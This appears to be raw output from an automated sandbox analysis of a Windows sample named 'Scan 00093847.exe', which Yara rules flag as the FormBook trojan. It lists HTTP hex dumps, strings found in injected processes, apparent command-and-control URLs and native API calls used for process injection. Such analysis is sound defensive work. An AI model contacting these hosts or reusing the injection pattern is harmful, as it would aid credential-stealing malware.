            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:46 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:48 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:37 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:40 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:43 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/plain; charset=utf-8Date: Sat, 07 Sep 2024 19:45:45 GMTContent-Length: 11Connection: closeData Raw: 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: Bad Request
            Source: setupugc.exe, 00000009.00000002.3554601037.0000000004564000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000002F04000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2361594319.000000001C224000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: Scan 00093847.exe, 00000000.00000002.1836424368.000000000307A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Scan 00093847.exe, 00000000.00000002.1844023650.0000000005900000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3555734438.0000000004FFB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mbwd.store
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3555734438.0000000004FFB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mbwd.store/pn1r/
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Scan 00093847.exe, 00000000.00000002.1844565242.0000000005940000.00000004.00000020.00020000.00000000.sdmp, Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Scan 00093847.exe, 00000000.00000002.1844896289.00000000070B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: setupugc.exe, 00000009.00000002.3554601037.0000000004D3E000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.00000000036DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: setupugc.exe, 00000009.00000002.3552722555.00000000035A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: setupugc.exe, 00000009.00000003.2247955546.0000000008639000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: setupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
            Source: uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
            Source: setupugc.exe, 00000009.00000002.3554601037.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, setupugc.exe, 00000009.00000002.3556550859.0000000006C10000.00000004.00000800.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.0000000003B94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: setupugc.exe, 00000009.00000003.2256786880.0000000008658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: setupugc.exe, 00000009.00000002.3554601037.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553867264.000000000354C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.masteriocp.online/wg84/?dxWljT6=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0ei

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_0042C593 NtClose,3_2_0042C593
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C35C0 NtCreateMutant,LdrInitializeThunk,3_2_010C35C0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2B60 NtClose,LdrInitializeThunk,3_2_010C2B60
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_010C2DF0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010C2C70
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C3010 NtOpenDirectoryObject,3_2_010C3010
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C3090 NtSetValueKey,3_2_010C3090
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C4340 NtSetContextThread,3_2_010C4340
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C4650 NtSuspendThread,3_2_010C4650
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C39B0 NtGetContextThread,3_2_010C39B0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2B80 NtQueryInformationFile,3_2_010C2B80
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2BA0 NtEnumerateValueKey,3_2_010C2BA0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2BE0 NtQueryValueKey,3_2_010C2BE0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2BF0 NtAllocateVirtualMemory,3_2_010C2BF0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2AB0 NtWaitForSingleObject,3_2_010C2AB0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2AD0 NtReadFile,3_2_010C2AD0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2AF0 NtWriteFile,3_2_010C2AF0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2D00 NtSetInformationFile,3_2_010C2D00
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C3D10 NtOpenProcessToken,3_2_010C3D10
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2D10 NtMapViewOfSection,3_2_010C2D10
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2D30 NtUnmapViewOfSection,3_2_010C2D30
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C3D70 NtOpenThread,3_2_010C3D70
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2DB0 NtEnumerateKey,3_2_010C2DB0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2DD0 NtDelayExecution,3_2_010C2DD0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2C00 NtQueryInformationProcess,3_2_010C2C00
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2C60 NtCreateKey,3_2_010C2C60
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2CA0 NtQueryInformationToken,3_2_010C2CA0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2CC0 NtQueryVirtualMemory,3_2_010C2CC0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2CF0 NtOpenProcess,3_2_010C2CF0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2F30 NtCreateSection,3_2_010C2F30
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2F60 NtCreateProcessEx,3_2_010C2F60
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2F90 NtProtectVirtualMemory,3_2_010C2F90
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2FA0 NtQuerySection,3_2_010C2FA0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2FB0 NtResumeThread,3_2_010C2FB0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2FE0 NtCreateFile,3_2_010C2FE0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2E30 NtWriteVirtualMemory,3_2_010C2E30
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2E80 NtReadVirtualMemory,3_2_010C2E80
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2EA0 NtAdjustPrivilegesToken,3_2_010C2EA0
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 3_2_010C2EE0 NtQueueApcThread,3_2_010C2EE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC4340 NtSetContextThread,LdrInitializeThunk,9_2_03BC4340
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC4650 NtSuspendThread,LdrInitializeThunk,9_2_03BC4650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_03BC2BA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03BC2BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03BC2BE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2B60 NtClose,LdrInitializeThunk,9_2_03BC2B60
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2AF0 NtWriteFile,LdrInitializeThunk,9_2_03BC2AF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2AD0 NtReadFile,LdrInitializeThunk,9_2_03BC2AD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2FB0 NtResumeThread,LdrInitializeThunk,9_2_03BC2FB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2FE0 NtCreateFile,LdrInitializeThunk,9_2_03BC2FE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2F30 NtCreateSection,LdrInitializeThunk,9_2_03BC2F30
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03BC2E80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_03BC2EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03BC2EE0
